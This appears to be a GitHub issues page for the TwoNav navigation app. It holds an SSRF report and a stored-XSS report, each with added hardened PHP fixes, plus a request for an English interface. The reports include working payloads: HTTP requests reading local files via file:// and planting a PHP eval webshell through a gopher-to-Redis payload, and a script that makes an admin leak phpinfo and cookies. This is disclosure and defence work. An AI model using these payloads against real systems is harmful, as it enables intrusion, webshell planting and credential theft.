twonav's Issues

SSRF Vulnerability in TwoNav v2.1.13-20240321

Vulnerability Product: TwoNav v2.1.13-20240321
Vulnerability version: v2.1.13-20240321
Vulnerability type: SSRF
Vulnerability location: system\api.php
When using TwoNav, I discovered an SSRF vulnerability in '站长工具' (Webmaster Tools) -> '连通测试' (Connectivity Test).
I can use this vulnerability to detect internal network information or more.
Given the following snippet:

```php
function read_data(){
    global $USER_DB;
    // The specified types are restricted to the root account only!
    if($USER_DB['UserGroup'] != 'root' && in_array( $_GET['type'],['diagnostic_log','connectivity_test','phpinfo'])){
        msg(-1,'无权限');
    }

    // Summary statistics
    if($_GET['type'] == 'home'){
        $category_count = count_db('user_categorys',['uid'=>UID])??0;
        $link_count = count_db('user_links',['uid'=>UID])??0;
        $index_count = get_db('user_count','v',['uid'=>UID,'k'=>date('Ym'),'t'=>'index_Ym'])??0;
        $click_count = get_db('user_count','v',['uid'=>UID,'k'=>date('Ym'),'t'=>'click_Ym'])??0;
        msgA( ['code'=>1,'data'=>[$category_count,$link_count,$index_count,$click_count] ]);
    // Connectivity test
    }elseif($_GET['type'] == 'connectivity_test'){
        if($GLOBALS['global_config']['offline'] == '1'){
            msg(1,'您已开启离线模式,无法使用该功能!');
        }
        $ch = curl_init();
        // SSRF sink: the POSTed URL reaches curl with no scheme, host or port validation,
        // so file://, dict:// and gopher:// targets are accepted along with internal hosts
        curl_setopt($ch, CURLOPT_URL, $_POST['url']);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        // TLS certificate verification is disabled as well
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

        $start = microtime(true);
        $response = curl_exec($ch);
        $end = microtime(true);
        $time = round(($end - $start) * 1000, 2);
        if(curl_errno($ch)) {
            $log .= "请求发生错误:".curl_error($ch);
        } else {
            // The full response body is echoed back to the caller (note: '.' binds tighter
            // than '??', so the 'Null' fallback never applies)
            $log .= "响应内容:".$response ?? 'Null' ;
            $log .= ",访问耗时:{$time} 毫秒。" ;
        }
        curl_close($ch);
        msg(1,$log);
    }
    // remaining branches of the function are not included in the report
}
```

Firstly, log in to the backend as an administrator.
Visit http://localhost/index.php?c=admin&u=admin#root/tool.
Click on '站长工具' (Webmaster Tools) -> '连通测试' (Connectivity Test), use Burp Suite to capture the packets, and modify the packet data.
Through testing, I have discovered various exploits, including but not limited to:
Read any file through the file protocol:

```http
POST /TwoNav/index.php?c=api&method=read_data&type=connectivity_test&u=admin HTTP/1.1
Host: 192.168.31.184
Content-Length: 19
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.31.184
Referer: http://192.168.31.184/TwoNav/?c=admin&page=root/tool&u=admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: TwoNavSID=mjehh1692q6k2m13345op8ljr5; admin_key=2da422eacc04d523b4732337fc682a70
Connection: close

url=file:///D:/flag
```

Detecting ports through the dict protocol.
Write a shell through the gopher protocol (if the server has Redis installed):

```http
POST /TwoNav/index.php?c=api&method=read_data&type=connectivity_test&u=admin HTTP/1.1
Host: 192.168.31.184
Content-Length: 662
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.31.184
Referer: http://192.168.31.184/TwoNav/?c=admin&page=root/tool&u=admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: db_type=mysql; TwoNav_initial=83r8q51c605fflp84i1ibsb6qi; admin_key=66495a9c3f40439d250286a81f4aa1dc; TwoNavSID=o8ckle5vgsfhuu4l2gq0so8e11
Connection: close

url=gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252433%250D%250A%250A%250A%253C%253Fphp%2520%2540eval%2528%2524_POST%255B%2527xxx%2527%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252427%250D%250AD%253A%255Cenv%255Cphp%255Cphpstudy_pro%255CWWW%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A=
```

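A hardened version of the connectivity_test branch, added here as an example; it is not TwoNav's code, and the function names (validate_target, public_ip_for, connectivity_test) are assumptions. It allows only http(s) on ports 80/443, resolves the host and rejects private and reserved ranges, pins the checked address with CURLOPT_RESOLVE so the DNS answer cannot change between the check and the request, refuses redirects, keeps certificate verification on, sets a curl-level protocol allowlist as a backstop, and reports only status and timing rather than the response body.

```php
<?php
// Added example, not TwoNav's code: a hardened replacement for the connectivity_test
// branch in system\api.php. All function names are assumptions.

// Resolve a host and return one public IPv4 address, or null if the name does not resolve
// or any answer is non-public. FILTER_FLAG_NO_PRIV_RANGE covers 10/8, 172.16/12, 192.168/16
// and fc00::/7; FILTER_FLAG_NO_RES_RANGE covers 0/8, 127/8, 169.254/16 (including the
// 169.254.169.254 cloud metadata address), 240/4, ::1, ::/128 and fe80::/10.
function public_ip_for(string $host): ?string {
    $candidates = filter_var($host, FILTER_VALIDATE_IP)
        ? [$host]
        : (gethostbynamel($host) ?: []);          // A records only in this example
    foreach ($candidates as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP,
                FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
            return null;                            // one non-public answer fails the whole host
        }
    }
    return $candidates[0] ?? null;
}

// Parse and allowlist the user-supplied target before it gets anywhere near curl.
function validate_target(string $url): ?array {
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) return null;
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) return null;   // no file://, gopher://, dict://
    if (isset($p['user']) || isset($p['pass'])) return null;        // no credentials in the URL
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    if (!in_array($port, [80, 443], true)) return null;             // no probing of other ports
    $host = trim($p['host'], '[]');                                 // bare IPv6 literals like [::1]
    $ip = public_ip_for($host);
    if ($ip === null) return null;
    return ['url' => $url, 'host' => $host, 'port' => $port, 'ip' => $ip];
}

// Reachability check that returns status and latency only, never the response body.
function connectivity_test(string $url): string {
    $t = validate_target($url);
    if ($t === null) {
        return 'Rejected: only public http(s) targets on ports 80/443 are allowed';
    }
    $ch = curl_init();
    $ok = curl_setopt_array($ch, [
        CURLOPT_URL             => $t['url'],
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS, // curl-level backstop
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION  => false,       // a redirect could point back at an internal host
        CURLOPT_RESOLVE         => ["{$t['host']}:{$t['port']}:{$t['ip']}"], // pin the checked IP
        CURLOPT_NOBODY          => true,        // HEAD request: reachability only
        CURLOPT_CONNECTTIMEOUT  => 5,
        CURLOPT_TIMEOUT         => 10,
        CURLOPT_SSL_VERIFYPEER  => true,
        CURLOPT_SSL_VERIFYHOST  => 2,
        CURLOPT_RETURNTRANSFER  => true,
    ]);
    if (!$ok) {
        curl_close($ch);
        return 'Request failed: could not configure curl';
    }
    $start = microtime(true);
    curl_exec($ch);
    $ms = round((microtime(true) - $start) * 1000, 2);
    $status = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    $err = curl_errno($ch) ? curl_error($ch) : null;
    curl_close($ch);
    if ($err !== null) {
        return "Request failed: {$err}";
    }
    return "HTTP {$status}, {$ms} ms";
}

if (PHP_SAPI === 'cli') {
    // Local try-out: pass a URL on the command line (example.com is a placeholder target)
    echo connectivity_test($argv[1] ?? 'https://example.com/'), "\n";
}
```

In the handler this would replace the block from `curl_init()` to `msg(1,$log)`, keeping the existing root-only check in front of it. The example resolves A records only; CURLOPT_RESOLVE pins the connection to the address that was checked, so curl does not fall back to an unchecked AAAA answer. CURLOPT_PROTOCOLS is deliberately redundant with the scheme check: if the validation is ever bypassed, curl itself still refuses file, dict and gopher.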

[Warning] Stored XSS in TwoNav v2.0.28-20230624

Vulnerability Product: TwoNav v2.0.28-20230624
Vulnerability version: v2.0.28-20230624
Vulnerability type: Stored XSS
Vulnerability Details:
Vulnerability location: add header, "/index.php?c=api&method=read_data&type=phpinfo&u=admin"

The default settings allow free registration, which causes stored XSS.
The stored XSS payload can make the admin call phpinfo() and bypass HttpOnly, causing disclosure of cookies, the website root path, PHP variables and so on.

Firstly, register an account at http://localhost/?c=login:
account: test
password: test

Then go to "站点设置" (Site Settings).
Because of HttpOnly, you need to make the admin call phpinfo(); the API is: http://localhost/index.php?c=api&method=read_data&type=phpinfo&u=admin
Enter the payload in the "头部(header)代码 - 用户" (Header code - User) input:

payload:

```html
<script src="http://cdn.bootcss.com/jquery/1.11.0/jquery.min.js" type="text/javascript"></script>
<script>
$.ajax({
    url: '/index.php?c=api&method=read_data&type=phpinfo&u=admin',
    type: 'get',
    success: function (data) {
        console.log(data);
    }
})
</script>
```

and click "保存" (Save).

After that, when an admin opens the page "http://localhost/?u=test", the page will automatically fetch phpinfo and print it with console.log().
(Of course you can update the payload to send phpinfo to your server; console.log is just a test.)
Finally, we download phpinfo and open it as HTML.
Here a large number of cookies was disclosed, along with the website root path.

Proved stored XSS.

discovered by leeya_bug
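One defensive pattern for the issue above, added here as an example and not TwoNav's own code: user-supplied header code is rebuilt from an allowlist of head elements and attributes before it is rendered, and the page is served with a nonce-based Content-Security-Policy so that any script the sanitiser misses still does not execute. The constant names, the function names and the sample input are assumptions; PHP 8 with ext-dom is assumed. The diagnostic endpoint that returns phpinfo() output to an authenticated GET is the other half of the problem and is not addressed by this snippet.

```php
<?php
// Added example, not TwoNav's code. Assumes PHP 8 with ext-dom; all names are assumptions.

const ALLOWED_TAGS  = ['meta', 'link', 'title', 'style'];        // no script, iframe, object, base
const ALLOWED_ATTRS = ['name', 'content', 'charset', 'rel', 'href', 'type', 'media'];
const ALLOWED_RELS  = ['stylesheet', 'icon'];

// Allow only relative and http(s) URLs. Control characters and whitespace are removed first
// because browsers ignore them, so "java\nscript:" would otherwise slip past the check.
function safe_href(string $url): bool {
    $url = preg_replace('/[\x00-\x20]+/', '', $url);
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if ($scheme === null) return true;                                  // relative URL
    if ($scheme === false) return false;                                // unparseable: reject
    return in_array(strtolower($scheme), ['http', 'https'], true);      // no javascript:, data:
}

// Rebuild the fragment from an allowlist instead of trying to strip known-bad markup.
function sanitize_header_code(string $html): string {
    $in = new DOMDocument();
    libxml_use_internal_errors(true);                  // untrusted input is frequently malformed
    $in->loadHTML('<?xml encoding="utf-8"?><html><head>' . $html . '</head><body></body></html>');
    libxml_clear_errors();
    $head = $in->getElementsByTagName('head')->item(0);
    if ($head === null) return '';

    $out = new DOMDocument('1.0', 'UTF-8');
    $pieces = [];
    foreach ($head->childNodes as $node) {
        if (!$node instanceof DOMElement) continue;                      // text and comments dropped
        $tag = strtolower($node->tagName);
        if (!in_array($tag, ALLOWED_TAGS, true)) continue;               // <script> etc. dropped
        $clean = $out->createElement($tag);
        foreach ($node->attributes as $attr) {
            $name = strtolower($attr->name);
            if (!in_array($name, ALLOWED_ATTRS, true)) continue;         // on*, http-equiv dropped
            if ($name === 'href' && !safe_href($attr->value)) continue 2; // drop the whole element
            if ($name === 'rel' && !in_array(strtolower($attr->value), ALLOWED_RELS, true)) continue 2;
            $clean->setAttribute($name, $attr->value);
        }
        if ($tag === 'title' || $tag === 'style') {
            $clean->appendChild($out->createTextNode($node->textContent)); // child elements discarded
        }
        $pieces[] = $out->saveHTML($clean);
    }
    return implode("\n", $pieces);
}

// Nonce-based CSP: inline and external scripts without this response's nonce do not run,
// so a stored <script> that got past the sanitiser would still be inert in the admin's browser.
function csp_header(string $nonce): string {
    return "Content-Security-Policy: default-src 'self'; script-src 'nonce-{$nonce}'; "
         . "object-src 'none'; base-uri 'self'; frame-ancestors 'self'";
}

// The application's own script tags carry the nonce; user-supplied markup never does.
function render_head(string $user_header_code, string $nonce): string {
    return sanitize_header_code($user_header_code)
        . "\n<script nonce=\"{$nonce}\" src=\"/static/app.js\"></script>";  // path is a placeholder
}

if (PHP_SAPI === 'cli') {
    // Constructed sample input modelled on the payload in the report, plus a javascript: link
    $sample = '<meta name="description" content="my links">'
            . '<script src="http://cdn.bootcss.com/jquery/1.11.0/jquery.min.js"></script>'
            . '<script>$.ajax({url:"/index.php?c=api&method=read_data&type=phpinfo&u=admin"})</script>'
            . '<link rel="stylesheet" href="javascript:alert(1)">'
            . '<link rel="stylesheet" href="/css/theme.css">';
    echo render_head($sample, base64_encode(random_bytes(16))), "\n";
} else {
    $nonce = base64_encode(random_bytes(16));
    header(csp_header($nonce));
    // $user_header_code is assumed to hold the page owner's "Header code - User" setting
    echo render_head($user_header_code ?? '', $nonce);
}
```

Run from the command line, the sample keeps the `<meta>` and the `/css/theme.css` link and discards both script tags and the `javascript:` link. The two layers are independent on purpose: the allowlist limits what is stored and rendered, while the CSP nonce limits what can execute even when a future feature renders more user HTML than the sanitiser anticipated.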

Hello, may I ask whether an English version is supported?

Because I need to build an English site, I would like to ask whether there is an option in the admin settings to switch the interface to English.
I searched around the admin panel and did not find an option to switch to an English interface.
